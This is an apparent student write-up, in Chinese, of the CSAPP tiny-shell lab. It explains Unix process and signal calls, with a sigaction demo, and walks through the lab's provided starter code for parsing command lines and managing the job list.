fork 函数是有趣的（也常常令人迷惑），因为它只被调用一次，却会返回两次：一次是在调用进程（父进程）中，一次是在新创建的子进程中，在父进程中，fork 返回子进程的 PID，在子进程中，fork 返回 0，因为子进程的 PID 总是为非零，返回值就提供一个明确的方法来分辨程序是在父进程还是在子进程中执行

pid_t waitpid(pid_t pid, int *statusp, int options);

一个进程可以通过调用 waitpid 函数来等待它的子进程终止或者停止

默认情况下（当 options=0 时），waitpid 挂起调用进程的执行，直到它的 等待集合（wait set）中的一个子进程终止。
如果等待集合中的一个进程在刚调用的时刻就已经终止了，那么 waitpid 就立即返回

在这两种情况中，waitpid 返回导致 waitpid 返回的已终止子进程的 PID，此时，已终止的子进程已经被回收，内核会从系统中删除掉它的所有痕迹

unsigned int sleep(unsigned int secs);

sleep 函数将一个进程挂起一段指定的时间

int pause(void);

pause 函数让调用函数休眠，直到该进程收到一个信号

int execve(const char *filename, const char *argv[], const char *envp[]);

execve 函数在当前进程的上下文中加载并运行一个新程序

1
2
3

char *getenv(const char *name);
int setenv(const char *name, const char *newvalue, int overwrite);
void unsetenv(const char *name);

getenv 函数在环境数组中搜索字符串 “name=value”，如果找到了，它就返回一个指向 value 的指针，否则它就返回 NULL

如果环境数组包含一个形如 “name=oldvalue” 的字符串，那么 unsetenv 会删除它，而 setenv 会用 newvalue 代替 oldvalue，但是只有在 overwrite 非零时才会这样，如果 name 不存在，那么 setenv 就把 “name=newvalue” 添加到数组中

int setpgid(pid_t pid, pid_t pgid);

将参数 pid 指定进程所属的组识别码设为参数 pgid 指定的组识别码

如果参数pid 为 0，则会用来设置目前进程的组识别码
如果参数pgid 为 0，则会以目前进程的进程识别码来取代

信号集函数

我们已经知道，我们可以通过信号来终止进程，也可以通过信号来在进程间进行通信，程序也可以通过指定信号的关联处理函数来改变信号的默认处理方式，也可以屏蔽某些信号，使其不能传递给进程

SIGINT：程序终止(interrupt)信号，在用户键入INTR字符(通常是Ctrl-C)时发出，用于通知前台进程组终止进程
SIGQUIT：和SIGINT类似，但由QUIT字符(通常是Ctrl-\)来控制，进程在因收到SIGQUIT退出时会产生core文件，在这个意义上类似于一个程序错误信号
SIGTERM：程序结束(terminate)信号，与SIGKILL不同的是该信号可以被阻塞和处理，通常用来要求程序自己正常退出，shell命令kill缺省产生这个信号（如果进程终止不了，我们才会尝试SIGKILL）
SIGSTOP：停止(stopped)进程的执行，注意它和terminate以及interrupt的区别，该进程还未结束，只是暂停执行，本信号不能被阻塞，处理或忽略
SIGCHLD：告知父进程回收自己，但该信号的默认处理动作为忽略，因此父进程仍然不会去回收子进程，需要捕捉处理实现子进程的回收
SIGTSTP：停止进程的运行，但该信号可以被处理和忽略，用户键入SUSP字符时(通常是Ctrl-Z)发出这个信号

那么我们应该如何设定我们需要处理的信号，我们不需要处理哪些信号等问题呢？信号集函数就是帮助我们解决这些问题的，下面是信号函数集：

int sigfillset(sigset_t *set); /* 填充 */

sigfillset 用来将参数 set 信号集初始化，然后把所有的信号加入到此信号集里

int sigemptyset(sigset_t *set); /* 清空 */

该函数的作用是将信号集初始化为空

int sigaddset(sigset_t *set, int signo); /* 添加 */

该函数的作用是把信号 signo 添加到信号集 set 中，成功时返回 0，失败时返回 -1

int sigdelset(sigset_t *set, int signo); /* 删除 */

该函数的作用是把信号 signo 从信号集 set 中删除，成功时返回 0，失败时返回 -1

int sigismember(const sigset_t *set, int signo); /* 是否是成员 */

判断给定的信号 signo 是否是信号集中的一个成员，如果是返回 1，如果不是，返回 0，如果给定的信号无效，返回 -1

int sigprocmask(int how, const sigset_t *restrict set, sigset_t *restrict oset);

检测或更改其信号屏蔽字

SIG_BLOCK 在本进程的阻塞列表中，添加 set 指向的阻塞列表
SIG_UNBLOCK 在本进程的阻塞列表中，删除 set 指向的阻塞列表
SIG_SETMASK 将目前的阻塞列表设成参数 set 指定的阻塞列表，如果参数 oset 不是 NULL ，那么目前的阻塞列表会由此指针返回（存储在 oset 中）

int sigpending(sigset_t *set); /* 待处理(已发出但尚未处理) */

将被阻塞的信号中 “停留在待处理状态” 的一组信号，写到参数 set 指向的信号集中，成功调用返回 0，否则返回 -1，并设置 errno 表明错误原因（获取被设置为SIG_BLOCK的信号集）

int sigsuspend(const sigset_t *sigmask); /* 挂起 */

通过将进程的屏蔽字替换为由参数 sigmask 给出的信号集，然后挂起进程的执行（在一个原子操作中先恢复信号屏蔽字，然后使进程休眠），如果接收到信号终止了程序，sigsuspend 就不会返回，如果接收到的信号没有终止程序，sigsuspend 就返回 -1，并将 errno 设置为 EINTR

// 注意操作的先后顺序，是先替换再挂起程序的执行

另外还有一个关键的结构体，以及其同名函数：

#include <signal.h>

/* Layout of struct sigaction as presented in this article (illustrative
   excerpt of the declaration normally obtained from <signal.h>). */
struct sigaction
{
    void (*sa_handler) (int);   /* pointer to the new signal-handling function */
    sigset_t sa_mask;           /* signals to be blocked while the handler is running */
    int sa_flags;               /* flags modifying how the signal is handled */
    void (*sa_restorer) (void); /* described as unused by the article */
};

/* Install act as the disposition for signal signum; the previous
   disposition is stored in oldact. */
int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

sa_handler ：代表新的信号处理函数
sa_mask ：用来设置在处理该信号时暂时将 sa_mask 指定的信号搁置
sa_flags ：用来设置信号处理的其他相关操作
sa_restorer ：此参数没有使用

函数 sigaction 会依参数 signum 指定的信号编号来设置该信号的处理函数，参数 signum 可以指定 SIGKILL 和 SIGSTOP 以外的所有信号

例子：

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
 
/*
 * handler - SIGINT handler for the demo: prints "Handle the signal <sig>\n"
 * on standard output.
 *
 * The message is assembled by hand and emitted with a single write(2).
 * printf() is not async-signal-safe: if the signal arrives while main() is
 * itself inside a stdio call, calling printf() here may deadlock or corrupt
 * the stream state.
 */
void handler(int sig)
{
    static const char prefix[] = "Handle the signal ";
    char msg[sizeof prefix + 16];   /* prefix + sign + up to 10 digits + '\n' */
    char digits[12];
    size_t len = 0;
    int ndigits = 0;
    /* Work on the magnitude as unsigned so that INT_MIN cannot overflow. */
    unsigned int value = (sig < 0) ? 0u - (unsigned int)sig : (unsigned int)sig;

    while (prefix[len] != '\0') {
        msg[len] = prefix[len];
        len++;
    }
    if (sig < 0) {
        msg[len++] = '-';
    }
    /* Digits come out least-significant first; reverse them into msg. */
    do {
        digits[ndigits++] = (char)('0' + value % 10u);
        value /= 10u;
    } while (value != 0u);
    while (ndigits > 0) {
        msg[len++] = digits[--ndigits];
    }
    msg[len++] = '\n';

    if (write(STDOUT_FILENO, msg, len) < 0) {
        /* Nothing async-signal-safe can be done about a failed write. */
    }
}
 
/*
 * Demo of the signal-set API: install a SIGINT handler, wait for one
 * SIGINT, block SIGINT for 10 seconds, report whether one became pending in
 * the meantime, then unblock it via sigsuspend() and exit 5 seconds later.
 */
int main(int argc, char **argv)
{	/* sigset_t is the type used to hold a set of signals */
    sigset_t sigset;    // the mask installed with sigprocmask()/sigsuspend()
    sigset_t ign;       // receives the set of pending signals from sigpending()
    struct sigaction act; 
 
    // Start with both sets empty
    sigemptyset(&sigset);
    sigemptyset(&ign);
 
    // Add SIGINT to the mask set
    sigaddset(&sigset, SIGINT);
 
    // Fill in the handler, an empty handler mask and no flags
    act.sa_handler = handler;
    sigemptyset(&act.sa_mask);
    act.sa_flags = 0;
    sigaction(SIGINT, &act, 0); /* associate handler with SIGINT */
 
    printf("Wait the signal SIGNAL...\n");
    pause();
 
    // Replace the process signal mask; here this blocks SIGINT
    sigprocmask(SIG_SETMASK, &sigset, 0);
    /* SIG_SETMASK: the process mask becomes exactly the set in sigset */
    printf("Please press Ctrl + C in 10 seconds...\n"); /* SIGINT is blocked from here on */
    sleep(10);
 
    // Check whether a SIGINT arrived while it was blocked
    sigpending(&ign); /* stores the signals that are pending (raised while blocked), not the blocked mask itself */
    if (sigismember(&ign, SIGINT)) /* is SIGINT among the pending signals? */
    {
        printf("The SIGINT signal has ignored\n");
    }
 
    // Remove SIGINT from the mask set
    sigdelset(&sigset, SIGINT);
    printf("Wait the signal SIGINT...\n");
 
    // Install the new mask (SIGINT no longer blocked)
    // and suspend the process until a signal is delivered
    sigsuspend(&sigset); /* mask replacement as with sigprocmask(SIG_SETMASK, &sigset, 0), followed by a wait */
 
    printf("The app will exit in 5 secondes!\n");
    sleep(5);
 
 	/* A SIGINT left pending from the blocked period is delivered as soon */
 	/* as sigsuspend() unblocks it, so the handler's message appears */
 	/* without the user pressing Ctrl+C again. */
    return 0;
}

➜  [/home/ywhkkx/桌面] ./test
Wait the signal SIGNAL...
^CHandle the signal 2
Please press Ctrl + C in 10 seconds... # SIGINT 被屏蔽了10秒
^C
^C
^C
^C
The SIGINT signal has ignored
Wait the signal SIGINT...
Handle the signal 2 # 设置的处理程序生效
The app will exit in 5 secondes!

实验要求

tsh 的提示符为tsh>
用户的输入分为第一个的name和后面的参数，之间以一个或多个空格隔开，如果name是一个tsh 内置的命令，那么 tsh 应该马上处理这个命令然后等待下一个输入，否则，tsh 应该假设name是一个路径上的可执行文件，并在一个子进程中运行这个文件（这也称为一个工作、job）
tsh 不需要支持管道和重定向
如果用户输入ctrl-c (ctrl-z)，那么SIGINT (SIGTSTP) 信号应该被送给每一个在前台进程组中的进程，如果没有进程，那么这两个信号应该不起作用
如果一个命令以“&”结尾，那么tsh应该将它们放在后台运行，否则就放在前台运行（并等待它的结束）
每一个工作（job）都可以用一个正整数PID或者job ID（JID）来标识，JID通过“%”前缀标识符表示，例如，“%5”表示JID为5的工作，而“5”代表PID为5的进程
tsh 应该有如下内置命令：
- quit: 退出当前shell
- jobs: 列出所有后台运行的工作
- bg <job>: 这个命令将会向 <job> 代表的工作发送SIGCONT信号并放在后台运行，<job> 可以是一个PID也可以是一个JID
- fg <job>: 这个命令会向 <job> 代表的工作发送SIGCONT信号并放在前台运行，<job> 可以是一个PID也可以是一个JID
tsh 应该回收（reap）所有僵尸子进程，如果一个工作是因为收到了一个它没有捕获的信号（没有安装对应的信号处理函数）而终止的，那么tsh应该输出这个工作的PID和这个信号的相关描述

解析已有代码

下面是实验已经给出的代码：

/*
 * tsh - A tiny shell program with job control
 *
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

 /* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
/* Parenthesized so the shift binds as one unit inside larger expressions
 * (for example MAXJID + 1 or MAXJID - 1). */
#define MAXJID    (1<<16) /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/*
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

 /* Global variables */
extern char** environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
char sbuf[MAXLINE];         /* for composing sprintf messages */

/* One entry of the job list. A slot whose pid is 0 is treated as free by
 * the job-list helpers. */
struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char* cmdline);
int builtin_cmd(char** argv);
void do_bgfg(char** argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char* cmdline, char** argv);
void sigquit_handler(int sig);

void clearjob(struct job_t* job);
void initjobs(struct job_t* jobs);
int maxjid(struct job_t* jobs);
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline);
int deletejob(struct job_t* jobs, pid_t pid);
pid_t fgpid(struct job_t* jobs);
struct job_t* getjobpid(struct job_t* jobs, pid_t pid);
struct job_t* getjobjid(struct job_t* jobs, int jid);
int pid2jid(pid_t pid);
void listjobs(struct job_t* jobs);

void usage(void);
void unix_error(char* msg);
void app_error(char* msg);
typedef void handler_t(int);
handler_t* Signal(int signum, handler_t* handler);

/*
 * main - The shell's main routine
 *
 * Parses the -h/-v/-p options, installs the signal handlers, initializes
 * the job list, then loops forever: print the prompt (unless -p was
 * given), read one line from stdin and pass it to eval(). Exits with
 * status 0 on end-of-file (ctrl-d).
 */
int main(int argc, char** argv)
{
    int c;               /* getopt() returns int; a plain char could never
                          * equal -1 on platforms where char is unsigned */
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line; getopt() returns -1 when options run out */
    while ((c = getopt(argc, argv, "hvp")) != -1) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
            break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
            break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
            break;
        default:              /* unknown option */
            usage();
            break;
        }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT, sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler);

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

        /* Read command line */
        if (emit_prompt) {
            printf("%s", prompt);
            fflush(stdout);
        }
        if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
            app_error("fgets error");
        if (feof(stdin)) { /* End of file (ctrl-d) */
            fflush(stdout);
            exit(0);
        }

        /* Evaluate the command line */
        eval(cmdline);
        fflush(stdout);
    }

    exit(0); /* control never reaches here */
}

/*
 * eval - Evaluate the command line that the user has just typed in
 *
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.
 *
 * NOTE: the text above is the specification to implement. As given, this
 * is an empty lab stub that ignores cmdline and returns immediately.
*/
void eval(char* cmdline)
{
    return;
}

/*
 * parseline - Parse the command line and build the argv array.
 *
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf) - 1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
        buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
        buf++;
        delim = strchr(buf, '\'');
    }
    else {
        delim = strchr(buf, ' ');
    }

    while (delim) {
        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
        while (*buf && (*buf == ' ')) /* ignore spaces */
            buf++;

        if (*buf == '\'') {
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc - 1] == '&')) != 0) {
        argv[--argc] = NULL;
    }
    return bg;
}

/*
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.
 *
 * NOTE: as given this is an unimplemented lab stub; it ignores argv and
 * returns 0 ("not a builtin") for every command.
 */
int builtin_cmd(char** argv)
{
    return 0;     /* not a builtin command */
}

/*
 * do_bgfg - Execute the builtin bg and fg commands
 *
 * NOTE: as given this is an unimplemented lab stub; it ignores argv and
 * returns immediately.
 */
void do_bgfg(char** argv)
{
    return;
}

/*
 * waitfg - Block until process pid is no longer the foreground process
 *
 * NOTE: as given this is an unimplemented lab stub; it does not block and
 * returns immediately.
 */
void waitfg(pid_t pid)
{
    return;
}

/*****************
 * Signal handlers
 *****************/

 /*
  * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
  *     a child job terminates (becomes a zombie), or stops because it
  *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
  *     available zombie children, but doesn't wait for any other
  *     currently running children to terminate.
  *
  * NOTE: the text above is the specification to implement. As given, this
  * is an empty lab stub that reaps nothing.
  */
void sigchld_handler(int sig)
{
    return;
}

/*
 * sigint_handler - The kernel sends a SIGINT to the shell whenever the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.
 *
 * NOTE: the text above is the specification to implement. As given, this
 * is an empty lab stub that forwards nothing.
 */
void sigint_handler(int sig)
{
    return;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.
 *
 * NOTE: the text above is the specification to implement. As given, this
 * is an empty lab stub that suspends nothing.
 */
void sigtstp_handler(int sig)
{
    return;
}

/*********************
 * End signal handlers
 *********************/

 /***********************************************
  * Helper routines that manipulate the job list
  **********************************************/

  /* clearjob - Reset one job slot to its unused state: empty command line,
   * state UNDEF, and zero job ID and PID. */
void clearjob(struct job_t* job)
{
    *job->cmdline = '\0';
    job->state = UNDEF;
    job->jid = 0;
    job->pid = 0;
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

/* maxjid - Scan the whole job list and return the largest job ID stored in
 * it, or 0 when no slot holds a positive job ID. */
int maxjid(struct job_t* jobs)
{
    int highest = 0;
    int slot = MAXJOBS;

    while (slot-- > 0) {
        if (highest < jobs[slot].jid) {
            highest = jobs[slot].jid;
        }
    }
    return highest;
}

/* addjob - Record a new job in the first free slot (pid == 0) of the list.
 *
 * Returns 1 when the job was stored. Returns 0 when pid is not positive or
 * when every slot is taken; the latter also prints a diagnostic. The job ID
 * comes from the global nextjid counter, which wraps back to 1 once it
 * exceeds MAXJOBS. */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    struct job_t* slot = NULL;
    int idx;

    if (pid < 1) {
        return 0;
    }

    /* Locate the first unused slot, if there is one. */
    for (idx = 0; idx < MAXJOBS && slot == NULL; idx++) {
        if (jobs[idx].pid == 0) {
            slot = &jobs[idx];
        }
    }
    if (slot == NULL) {
        printf("Tried to create too many jobs\n");
        return 0;
    }

    slot->pid = pid;
    slot->state = state;
    slot->jid = nextjid++;
    if (nextjid > MAXJOBS) {
        nextjid = 1;
    }
    strcpy(slot->cmdline, cmdline);
    if (verbose) {
        printf("Added job [%d] %d %s\n", slot->jid, slot->pid, slot->cmdline);
    }
    return 1;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t* jobs, pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == pid) {
            clearjob(&jobs[i]);
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

/* fgpid - Return the PID of the first job in state FG, or 0 when the list
 * holds no foreground job. */
pid_t fgpid(struct job_t* jobs)
{
    int slot = 0;

    while (slot < MAXJOBS) {
        if (jobs[slot].state == FG) {
            return jobs[slot].pid;
        }
        slot++;
    }
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

/* pid2jid - Translate a process ID into its job ID (0 if pid is invalid or unknown) */
int pid2jid(pid_t pid)
{
    int found = 0;

    /* Searches the global job list rather than a list passed by the caller. */
    for (int idx = 0; pid >= 1 && idx < MAXJOBS; idx++) {
        if (jobs[idx].pid == pid) {
            found = jobs[idx].jid;
            break;
        }
    }
    return found;
}

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}
/******************************
 * end job list helper routines
 ******************************/


 /***********************
  * Other helper routines
  ***********************/

  /*
   * usage - print a help message
   */
void usage(void)
{
    /* Print the option summary on stdout and terminate with status 1. */
    fputs("Usage: shell [-hvp]\n"
          "   -h   print this message\n"
          "   -v   print additional diagnostic information\n"
          "   -p   do not emit a command prompt\n", stdout);
    exit(1);
}

/*
 * unix_error - Print msg followed by the description of the current errno
 *              on stdout, then exit with status 1.
 */
void unix_error(char* msg)
{
    const char* reason = strerror(errno);

    printf("%s: %s\n", msg, reason);
    exit(1);
}

/*
 * app_error - Print an application-level error message on stdout,
 *             then exit with status 1.
 */
void app_error(char* msg)
{
    printf("%s\n", msg);
    exit(1);
}

/*
 * Signal - Install handler for signum through sigaction() and return the
 *          previously installed handler. Exits via unix_error() on failure.
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction new_act;
    struct sigaction prev_act;

    sigemptyset(&new_act.sa_mask);   /* no additional signals in the handler mask */
    new_act.sa_flags = SA_RESTART;   /* restart syscalls if possible */
    new_act.sa_handler = handler;

    if (sigaction(signum, &new_act, &prev_act) < 0)
        unix_error("Signal error");
    return prev_act.sa_handler;
}

/*
 * sigquit_handler - Handler for SIGQUIT: announce the signal on stdout
 *    and terminate the shell with status 1.
 */
void sigquit_handler(int sig)
{
    (void)sig;   /* the signal number is not needed */
    fputs("Terminating after receipt of SIGQUIT signal\n", stdout);
    exit(1);
}

接下来就一个一个分析已有的函数（不包括 main）

Parseline

int main(int argc, char** argv)

argv[]：表示的是一个指针数组，一共有 argc 个元素，其中存放的是指向每一个参数的指针

argc：参数个数

/*
 * parseline - Split cmdline into arguments and fill argv with pointers to them.
 *
 * Arguments are separated by spaces; text enclosed in single quotes is kept
 * as one argument. argv is terminated with NULL.
 *
 * Returns 1 when the last argument starts with '&' (that argument is removed
 * from argv) or when the line is blank, otherwise 0.
 *
 * The argv entries point into a static buffer, so they are overwritten by
 * the next call.
 * NOTE(review): the number of arguments is not checked against the capacity
 * of the caller's argv array; the caller must provide enough room.
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to the delimiter ending the current arg */
    int argc = 0;               /* number of args */
    int bg;                     /* background job? */
    size_t len;

    strcpy(buf, cmdline);
    len = strlen(buf);
    if (len > 0)                /* an empty line has no last character to replace */
        buf[len - 1] = ' ';     /* replace trailing '\n' with space */

    /* Build the argv list */
    for (;;) {
        while (*buf == ' ')     /* ignore leading spaces */
            buf++;

        if (*buf == '\'') {     /* quoted argument: runs to the closing quote */
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
        if (delim == NULL)
            break;

        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    bg = (*argv[argc - 1] == '&');
    if (bg)
        argv[--argc] = NULL;
    return bg;
}

parseline 函数解析了以空格分隔的命令行参数（跳过所有空格和单引号，获取其中的有效指令），并构造最终会传递给 execve 的 argv 向量

// ‘&’ 表示后台运行，parseline 函数把是否在后台运行的信息存储在bg中，并返回

Struct job_t

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID (process ID) */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* job state: UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line that started the job */
};
struct job_t jobs[MAXJOBS]; /* The job list */

全局结构体 job_t 是与“任务”有关的结构体

基于它，出现了以下的函数：

/* clearjob - Reset a job struct so the slot reads as unused */
void clearjob(struct job_t* job) {
    job->cmdline[0] = '\0';
    job->state = UNDEF;
    job->jid = 0;
    job->pid = 0;
}

清空一个任务

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

任务初始化

/* maxjid - Return the highest job ID stored in the list (0 if there is none) */
int maxjid(struct job_t* jobs)
{
    int largest = 0;

    for (int idx = 0; idx < MAXJOBS; idx++) {
        int jid = jobs[idx].jid;
        largest = (jid > largest) ? jid : largest;
    }
    return largest;
}

获取最大的任务ID

/*
 * addjob - Store a new job in the first free slot of the job list.
 * Returns 1 on success, 0 if pid is invalid or the list is full.
 */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    struct job_t* slot = NULL;

    if (pid < 1)
        return 0;

    /* A slot whose pid is 0 is unused; take the first one. */
    for (int idx = 0; idx < MAXJOBS && slot == NULL; idx++) {
        if (jobs[idx].pid == 0)
            slot = &jobs[idx];
    }

    if (slot == NULL) {
        printf("Tried to create too many jobs\n");
        return 0;
    }

    slot->pid = pid;
    slot->state = state;
    slot->jid = nextjid;
    nextjid++;
    if (nextjid > MAXJOBS)      /* wrap the job ID counter */
        nextjid = 1;
    strcpy(slot->cmdline, cmdline);
    if (verbose)
        printf("Added job [%d] %d %s\n", slot->jid, slot->pid, slot->cmdline);
    return 1;
}

添加一个新任务

/*
 * deletejob - Remove the job whose PID equals pid from the job list.
 * Returns 1 if a job was removed, 0 otherwise.
 */
int deletejob(struct job_t* jobs, pid_t pid)
{
    if (pid >= 1) {
        for (int idx = 0; idx < MAXJOBS; idx++) {
            if (jobs[idx].pid != pid)
                continue;
            clearjob(&jobs[idx]);
            /* The next ID follows the largest ID still in use. */
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

删除一个任务

/* fgpid - PID of the first job in the FG state, or 0 when there is none */
pid_t fgpid(struct job_t* jobs) {
    int idx = 0;

    while (idx < MAXJOBS) {
        if (jobs[idx].state == FG)
            return jobs[idx].pid;
        idx++;
    }
    return 0;
}

返回当前前台任务的 进程ID（没有前台任务时返回 0）

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

根据 进程ID 获取 任务地址

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

根据 任务ID 获取 任务地址

/* pid2jid - Translate a process ID into its job ID (0 if pid is invalid or unknown) */
int pid2jid(pid_t pid)
{
    int found = 0;

    /* Searches the global job list rather than a list passed by the caller. */
    for (int idx = 0; pid >= 1 && idx < MAXJOBS; idx++) {
        if (jobs[idx].pid == pid) {
            found = jobs[idx].jid;
            break;
        }
    }
    return found;
}

根据 进程ID 获取 任务ID

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}

打印任务的 “信息”，“状态” 和 “命令行”

Signal

对于程序的信号处理，先给出了 Signal：

/*
 * Signal - Install handler for signum through sigaction() and return the
 *          previously installed handler. Exits via unix_error() on failure.
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction new_act;
    struct sigaction prev_act;

    sigemptyset(&new_act.sa_mask);   /* no additional signals in the handler mask */
    new_act.sa_flags = SA_RESTART;   /* restart syscalls if possible */
    new_act.sa_handler = handler;

    if (sigaction(signum, &new_act, &prev_act) < 0)
        unix_error("Signal error");
    return prev_act.sa_handler;
}

总而言之，Signal 用于初始化信号处理机制，通过调用 sigemptyset 来清空 sa_mask，通过调用 sigaction 把特定信号和特定处理程序绑定

最后给出了两个错误处理函数和一个 SIGQUIT 信号处理程序：

/* unix_error - Print msg plus the current errno description on stdout, then exit(1) */
void unix_error(char* msg)
{
    const char* reason = strerror(errno);

    printf("%s: %s\n", msg, reason);
    exit(1);
}

/* app_error - Print an application-level error message on stdout, then exit(1) */
void app_error(char* msg)
{
    printf("%s\n", msg);
    exit(1);
}

